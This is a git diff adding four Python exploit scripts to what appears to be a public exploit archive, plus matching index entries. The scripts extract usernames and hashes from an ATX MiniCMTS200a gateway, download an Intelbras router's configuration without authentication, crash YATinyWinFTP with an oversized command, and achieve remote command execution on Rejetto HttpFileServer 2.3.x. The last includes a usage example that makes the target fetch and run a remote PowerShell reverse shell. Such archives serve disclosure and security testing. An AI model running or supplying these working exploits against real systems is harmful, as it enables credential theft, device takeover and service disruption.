diff --git a/exploits/hardware/webapps/49124.py b/exploits/hardware/webapps/49124.py new file mode 100755 index 000000000..63f5e940a --- /dev/null +++ b/exploits/hardware/webapps/49124.py @@ -0,0 +1,45 @@ +# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure +# Date: 2020-11-20 +# Exploit Author: Zagros Bingol +# Vendor Homepage: http://www.atx.com +# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ +# Version: 2.0 and earlier +# Tested on: Debian 10 64bit + +------------------------------------- + +Endpoint: +http://www.ip/domain.com/inc/user.ini + +-------------------------------------- + +Proof-of-Concept: + +#!/usr/bin/python3 +#License: GNU General Public license v3.0 +#Author: Zagros Bingol(Zagrosbingol@outlook.com) + + +import requests +import re + +target = input("Target(ex:http://host): \n") +port = input("Port: \n") + + +def sploit(target, port): +print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 - +Credential Disclosure\n") +r = requests.post(target + ":" + port + '/inc/user.ini') +searching = re.findall(r"\[.{1,8}\]", str(r.text)) +print("Usernames:\n") +print(", ".join(searching).replace("[", "").replace("]", "")) + +def hash(): +r = requests.post(target + '/inc/user.ini') +searching = re.findall(r"([a-fA-F\d]{32})", str(r.text)) +print("Hashes:\n") +print(", ".join(searching).replace("[", "").replace("]", "")) +hash() + +sploit(target, port) \ No newline at end of file diff --git a/exploits/hardware/webapps/49126.py b/exploits/hardware/webapps/49126.py new file mode 100755 index 000000000..23bd77eb6 --- /dev/null +++ b/exploits/hardware/webapps/49126.py @@ -0,0 +1,37 @@ +# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass +# Date: 27/11/2020 +# Exploit Author: Kaio Amaral +# Vendor Homepage: https://www.intelbras.com/pt-br/ +# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip +# Version: firmware version 1.1.2 +# Tested on: kali, android + +# POC + +# 1. nc host port, ex: nc 10.0.0.1 80 +# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0 + +# Python3 + +import socket +from time import sleep + +def exploit(host, port=80): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode() + s.connect((host, port)) + s.send(pay) + sleep(0.2) + data = s.recv(17576) + if len(data) > 1000: + print("[+] Success.") + return data.decode() + print("[-] Failed. ") + exit() + +def file(data): + with open("router.cfg", "w") as file: + file.write(data[233:]) + print("[+] File Successfully Written.") + +file(exploit("10.0.0.1")) \ No newline at end of file diff --git a/exploits/windows/remote/49127.py b/exploits/windows/remote/49127.py new file mode 100755 index 000000000..3e454c91b --- /dev/null +++ b/exploits/windows/remote/49127.py @@ -0,0 +1,35 @@ +# Exploit Title: YATinyWinFTP - Denial of Service (PoC) +# Google Dork: None +# Date: 20.08.2020 +# Exploit Author: strider +# Vendor Homepage: https://github.com/ik80/YATinyWinFTP +# Software Link: https://github.com/ik80/YATinyWinFTP +# Tested on: Windows 10 + +------------------------------[Description]--------------------------------- + +This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end. +The result it crashes + + -----------------------------[Exploit]--------------------------------------------- + +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +import socket, sys + +target = (sys.argv[1], int(sys.argv[2])) +buffer = b'A' * 272 + b'\x20' +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(target) +print(s.recv(1024)) +s.send(buffer) +s.close() + + -----------------------------[how to run]----------------------------- + +C:\> TinyWinFTP.exe servepath port + +~$ python3 exploit.py targetip port + +Boom! \ No newline at end of file diff --git a/exploits/windows/webapps/49125.py b/exploits/windows/webapps/49125.py new file mode 100755 index 000000000..e8f8eed53 --- /dev/null +++ b/exploits/windows/webapps/49125.py @@ -0,0 +1,29 @@ +# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) +# Google Dork: intext:"httpfileserver 2.3" +# Date: 28-11-2020 +# Remote: Yes +# Exploit Author: Óscar Andreu +# Vendor Homepage: http://rejetto.com/ +# Software Link: http://sourceforge.net/projects/hfs/ +# Version: 2.3.x +# Tested on: Windows Server 2008 , Windows 8, Windows 7 +# CVE : CVE-2014-6287 + +#!/usr/bin/python3 + +# Usage : python3 Exploit.py +# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')" + +import urllib3 +import sys +import urllib.parse + +try: + http = urllib3.PoolManager() + url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}' + print(url) + response = http.request('GET', url) + +except Exception as ex: + print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command") + print(ex) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0d8798fae..e35b12e6f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18313,6 +18313,7 @@ id,file,description,date,author,type,platform,port 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows, 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware, 49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows, +49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43345,3 +43346,6 @@ id,file,description,date,author,type,platform,port 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php, 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php, 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php, +49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware, +49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows, +49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,